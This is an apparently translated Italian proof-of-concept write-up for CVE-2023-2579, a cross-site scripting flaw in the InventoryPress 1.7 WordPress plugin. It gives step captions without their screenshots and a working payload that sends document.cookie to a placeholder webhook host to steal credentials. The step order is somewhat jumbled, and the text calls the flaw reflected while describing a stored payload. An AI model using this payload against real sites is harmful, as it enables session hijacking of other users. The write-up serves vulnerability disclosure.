
PoC per CVE-2023-2579
L'ID CVE-2023-2579 è stato riservato e il PoC è stato pubblicato sul sito WPScan: https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe
Titolo: Cross-Site Scripting Riflesso Autenticato nel Plugin InventoryPress per WordPress CMS
Data: 2023-04-21
Autore: Danilo Albuquerque
Homepage del fornitore: https://wordpress.org
Link del software: https://wordpress.org/download
Versione: WordPress 6.2
Nome e versione del plugin: InventoryPress 1.7
Testato su: Brave (Versione 1.50.119 Chromium: 112.0.5615.121 (Versione ufficiale) 64 bit)
Quando fai tutto questo e aggiorni la pagina corrente, verrà visualizzato il pop-up di avviso con il messaggio al suo interno.
Vai alla pagina in cui puoi aggiungere gli articoli all'inventario:

Inserisci il payload malevolo nel campo "Descrizione" del modulo:

Accedi al link del nuovo articolo generato dal plugin:

Una volta effettuata la richiesta, viene mostrato il pop-up di avviso:

Aggiungi il seguente payload per rubare i cookie nel campo "Descrizione": <script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>. Quindi pubblica un nuovo articolo o aggiornane uno esistente;
Attiva e ottieni le credenziali nel sito Webhook
Aggiunta del payload e pubblicazione dell'articolo (o aggiornamento):

Attivazione e ottenimento delle credenziali:
